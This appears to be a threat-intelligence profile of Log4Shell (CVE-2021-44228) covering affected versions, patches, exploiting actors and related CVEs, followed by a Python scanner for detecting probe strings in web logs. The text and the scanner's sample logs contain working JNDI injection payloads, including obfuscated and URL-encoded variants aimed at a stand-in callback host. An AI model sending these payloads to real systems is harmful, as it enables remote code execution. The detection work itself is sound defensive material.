Log4Shell

Vulnerability updated a day ago (2024-11-20T17:39:28.516Z)
Log4Shell is the name given to CVE-2021-44228, a critical remote code execution (RCE) vulnerability in Apache Log4j 2, the Java logging library embedded in a very large share of enterprise Java software. Affected versions (2.0-beta9 through 2.14.1, with 2.15.0 only partly fixed) evaluate lookup expressions of the form ${...} inside the text they log. An attacker who can get a string such as ${jndi:ldap://attacker-host/x} into any field the application logs (an HTTP User-Agent header, a username, a chat message) makes the server perform a JNDI lookup against an attacker-controlled server and load the object it returns, which yields code execution as the application's user with no authentication. Two follow-up CVEs are usually grouped with it: CVE-2021-45046 (the 2.15.0 fix was incomplete and still allowed RCE in some non-default configurations; fixed in 2.16.0, which disabled message lookups and JNDI by default) and CVE-2021-45105 (a denial of service through uncontrolled recursion in self-referential lookups; fixed in 2.17.0). The Apache advisory recommended upgrading to at least 2.17.1 (Java 8 and later), 2.12.4 (Java 7) or 2.3.2 (Java 6); where upgrading is impossible, removing the JndiLookup class from the log4j-core jar is the vendor-documented mitigation.

Public disclosure came on December 10, 2021 and mass scanning and exploitation followed within hours; by around December 15, 2021 the StealthLoader cryptomining malware was using it. It has since been exploited by a wide range of actors, including LockBit ransomware affiliates, the financially motivated initial access broker GOLD MELODY (UNC961) and North Korean state-sponsored groups, to gain unauthorized access to victims' systems, execute arbitrary code and stage data theft or disruption. A recurring pattern is initial access through internet-facing products that bundle a vulnerable Log4j, notably VMware Horizon servers and MobileIron Core servers.

Remediation has lagged badly: three years after disclosure, about 13% of Log4j downloads were still of vulnerable versions, so the exposure is persistent rather than historical. CISA and partner agencies published the joint Cybersecurity Advisory (CSA) Mitigating Log4Shell and Other Log4j-Related Vulnerabilities, yet malicious cyber actors continue to exploit Log4Shell, especially in unpatched VMware Horizon systems. Organizations should inventory every Log4j instance, including copies bundled inside third-party products, where most of the remaining exposure sits, apply the patches promptly, and restrict or monitor outbound LDAP, RMI and DNS from application servers, since the exploit depends on that outbound connection to fetch its payload.
Description last updated: 2024-11-15T15:57:18.747Z
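As an added example, not code from this page, from Apache Log4j or from any vendor cited here, the following Python scanner shows the detection side of the description above: it finds Log4Shell probe strings in web-server logs, including the nested-lookup evasions (${${lower:j}ndi:...}, ${${env:NaN:-j}ndi:...}, ${::-l}) and URL-encoded variants that defeat a naive search for the literal text jndi. The log lines are constructed for the example, the callback address is from a documentation IP range, and the lookup resolver models only the prefixes used for evasion (an assumption stated in the code); it is an approximation of Log4j's evaluation, not a reimplementation of it.

```python
"""Detection of Log4Shell (CVE-2021-44228) probe strings in web-server logs.

Attackers rarely send the literal "${jndi:ldap://...}". Log4j evaluates nested
lookups from the inside out, so "${${lower:j}ndi:...}" reaches the JNDI lookup
intact while defeating a substring match. This scanner URL-decodes each line,
collapses nested lookups roughly the way Log4j's StrSubstitutor would, and
then matches the resulting jndi: expression.
"""
import re
import urllib.parse

# Innermost ${...} expression: a body with no further '$', '{' or '}'.
INNER = re.compile(r"\$\{([^${}]*)\}")

# Resolved jndi lookup: scheme and callback authority (host:port) of the URL.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(\w+)\s*:(?://)?([^/}\s]*)", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Evaluate one innermost lookup body such as 'lower:j', 'env:NaN:-j' or '::-l'.

    Log4j syntax is ${prefix:key:-default}. Unset variables (env, sys, ctx, ...)
    fall back to the default, which is exactly how evasions smuggle single
    characters. Assumption: every prefix other than lower/upper resolves to the
    default. That is enough for detection but is not Log4j's real output for,
    say, ${date:yyyy}.
    """
    spec, _, default = body.partition(":-")
    prefix, _, key = spec.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    return default


def normalize(text: str, max_rounds: int = 16) -> str:
    """URL-decode (repeatedly, for double encoding) and collapse nested lookups
    until only top-level jndi: expressions remain or the round cap is reached."""
    s = text
    for _ in range(3):
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            body = m.group(1)
            if body.lstrip().lower().startswith("jndi:"):
                return m.group(0)  # keep the expression we want to report
            changed = True
            return _resolve(body)

        s = INNER.sub(repl, s)
        if not changed:
            break
    return s


def scan(lines):
    """Return one finding per log line that carries a resolved jndi: lookup."""
    findings = []
    for line in lines:
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            findings.append({
                "line": line,
                "normalized": norm,
                "scheme": m.group(1).lower(),  # ldap, ldaps, rmi, dns, ...
                "callback": m.group(2),        # attacker-controlled host:port
            })
    return findings


# Constructed sample lines in Apache combined log format (not real traffic;
# 198.51.100.0/24 is a documentation range).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:15:22 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:15:40 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3A'
    'ldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '10.0.0.9 - - [10/Dec/2021:03:16:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NaN:-j}ndi:${::-l}dap://198.51.100.7:1389/a}"',
    '10.0.0.12 - - [10/Dec/2021:03:17:00 +0000] "GET /login HTTP/1.1" 200 900 "-" '
    '"Mozilla/5.0 ${date:yyyy}"',  # a lookup, but not a JNDI one: not reported
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f['scheme']}://{f['callback']}  <-  {f['normalized']}")
```

The callback host:port is the most useful field to pivot on: it is the attacker's LDAP/RMI server, so it can be fed straight to egress-firewall and DNS logs to confirm whether any application server actually connected back, which is the difference between a scan and a compromise.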
Possible Aliases / Cluster overlaps
Cluster overlaps and naming conventions differ between vendors, so the following names and profiles may refer to the same thing and are worth checking alongside this entry.
Alias / Description / Votes
CVE-2021-44228 (votes: 11). CVE-2021-44228 is the CVE identifier for Log4Shell, a critical flaw in Apache's Log4j library. Disclosed in December 2021, it quickly became one of the most severe bugs on record because of the library's ubiquity and the ease of exploitation. Various Advanced Persistent Threat (APT) actors attempted ...
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Vulnerability, Log4j, Exploit, Apache, exploitation, Remote Code ..., Exploits, Ransomware, Malware, Confluence, exploited, Source, flaw, Operation Bl..., Cisco, RCE (Remote ..., Moveit, Lateral Move..., Manageengine, Botnet, Apt, Ofbiz, Chrome, Secureworks, Linux, Phishing, bugs, Implant, Reconnaissance, Payload, Iran, Zero Day, Apache Struts
Associated Malware
Malware / Description / Association type / Votes
EarlyRat (association type: unspecified; votes: 2). EarlyRat is a previously undocumented remote access trojan that Kaspersky researchers described in June 2023. The North Korea-linked APT group Andariel used it in attacks the previous year that began with exploitation of Log4Shell; the malware was first noticed in one of those Log4j cases ...
Kinsing (association type: unspecified; votes: 2). Kinsing is a Linux cryptomining malware family that mass-exploits newly disclosed server-side vulnerabilities, Log4Shell among them, on internet-facing hosts and container infrastructure to install miners and enrol the victims in its botnet.
Conti (association type: has used; votes: 2). Conti is a ransomware operation. In December 2021 its operators were reported exploiting Log4Shell against VMware vCenter servers inside networks they had already breached, using it for lateral movement rather than initial access.
Associated Threat Actors
Threat actor / Description / Association type / Votes
Andariel (association type: unspecified; votes: 4). Andariel, a threat actor run by North Korea's military intelligence agency, the Reconnaissance General Bureau, conducts cyber espionage and ransomware operations, funding the former through ransomware attacks that have primarily hit U.S. healthcare entities ...
Lazarus Group (association type: unspecified; votes: 4). The Lazarus Group, North Korea's best-known state-sponsored threat actor, is among the most prolific and dangerous in operation. It has carried out many high-profile attacks, including Operation DreamJob activity against a target in Spain, with the primary objective of funding North Korea ...
Associated Vulnerabilities
Vulnerability / Description / Association type / Votes
ProxyShell (association type: unspecified; votes: 5). ProxyShell is a chain of three Microsoft Exchange Server vulnerabilities (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207) that together give a remote attacker code execution on the server, posing a significant risk to organizations worldwide. Since 2021 it has been exploited by, among others, Iranian government-sponsored APT actors ...
Follina (association type: unspecified; votes: 3). Follina (CVE-2022-30190) is a remote code execution vulnerability in the Microsoft Support Diagnostic Tool (MSDT) that was discovered and exploited in the first half of 2022 and weaponized by the threat actor TA413 shortly after its publication.
CVE-2022-30190 (association type: unspecified; votes: 3). CVE-2022-30190, "Follina", is a high-risk flaw in the Microsoft Support Diagnostic Tool that allows remote code execution, typically triggered from a crafted Office document. Disclosed as a zero-day in May 2022, it has been exploited by threat actors including TA413, who weaponized it ...
CVE-2021-45046 (association type: is / was; votes: 2). The follow-up to CVE-2021-44228: the fix shipped in Log4j 2.15.0 was incomplete and certain non-default configurations remained exploitable; fixed in 2.16.0.
CVE-2021-34523 (association type: unspecified; votes: 2). One of the three Microsoft Exchange Server vulnerabilities in the ProxyShell chain, together with CVE-2021-34473 and CVE-2021-31207.
CVE-2021-26084 (association type: unspecified; votes: 2). A critical OGNL injection vulnerability in Atlassian Confluence Server and Data Center, disclosed by Atlassian in August 2021 and mass-exploited within days of disclosure; it allows remote attackers to execute code on the server.
CVE-2022-22954 (association type: unspecified; votes: 2). A server-side template injection in VMware Workspace ONE Access and Identity Manager that allows unauthenticated remote code execution; disclosed in April 2022 and exploited in the wild shortly afterwards, often chained with CVE-2022-22960 for privilege escalation ...
CVE-2022-1388 (association type: unspecified; votes: 2). An authentication bypass in the iControl REST interface of F5 BIG-IP that lets an unauthenticated attacker with network access to the management interface execute arbitrary commands; disclosed in May 2022 and exploited within days ...
CVE-2022-26134 (association type: unspecified; votes: 2). A critical OGNL injection vulnerability in Atlassian Confluence Server and Data Center that allows remote code execution (RCE); it was exploited as a zero-day and publicly disclosed by Atlassian in June 2022, and the Cybersecurity and Infrastructure Security Agency (CISA) added it to its Known Exploited Vulnerabilities catalog ...
CVE-2021-34473 (association type: unspecified; votes: 2). A pre-authentication path confusion vulnerability in Microsoft Exchange Server that, chained with CVE-2021-31207 and CVE-2021-34523, forms ProxyShell; remote attackers exploit the three together to gain code execution on the server ...
CVE-2018-13379 (association type: unspecified; votes: 2). A path traversal in the SSL VPN web portal of Fortinet FortiOS (and FortiProxy) that lets an unauthenticated attacker read system files, including session files that expose credentials. It has been exploited so routinely that it appears on CISA's annual lists of the most routinely exploited vulnerabilities ...
CVE-2021-31207 (association type: unspecified; votes: 2). A Microsoft Exchange Server security feature bypass that is the third link in the ProxyShell chain; it has been exploited by APT40, a group known for rapidly taking advantage of newly public vulnerabilities in widely used software ...
CVE-2021-40539 (association type: unspecified; votes: 2). An authentication bypass leading to remote code execution in Zoho ManageEngine ADSelfService Plus, exploited in the wild in 2021.
CVE-2022-22960 (association type: unspecified; votes: 2). A local privilege escalation in VMware Workspace ONE Access, Identity Manager and vRealize Automation, chained in the wild with CVE-2022-22954.
CVE-2017-5638 (association type: unspecified; votes: 2). A remote command execution vulnerability in the Jakarta Multipart parser of Apache Struts 2, a widely used open-source framework for Java web applications: a crafted Content-Type header is evaluated as an OGNL expression, letting an unauthenticated attacker run commands on the server running the vulnerable application ...
Source Document References
Information about the Log4Shell vulnerability was read from the documents below. This display is limited to 20 results.
Source / Created (relative to the record update date above)
Checkpoint, 10 hours ago
CISA, 6 days ago
Checkpoint, 10 days ago
Checkpoint, 17 days ago
BankInfoSecurity, 21 days ago
Checkpoint, 23 days ago
Checkpoint, a month ago
Checkpoint, a month ago
InfoSecurity-magazine, a month ago
Checkpoint, a month ago
Checkpoint, 2 months ago
BankInfoSecurity, 2 months ago
Checkpoint, 2 months ago
Checkpoint, 2 months ago
Checkpoint, 2 months ago
Checkpoint, 3 months ago
Checkpoint, 3 months ago
Checkpoint, 3 months ago
Checkpoint, 3 months ago
Checkpoint, 4 months ago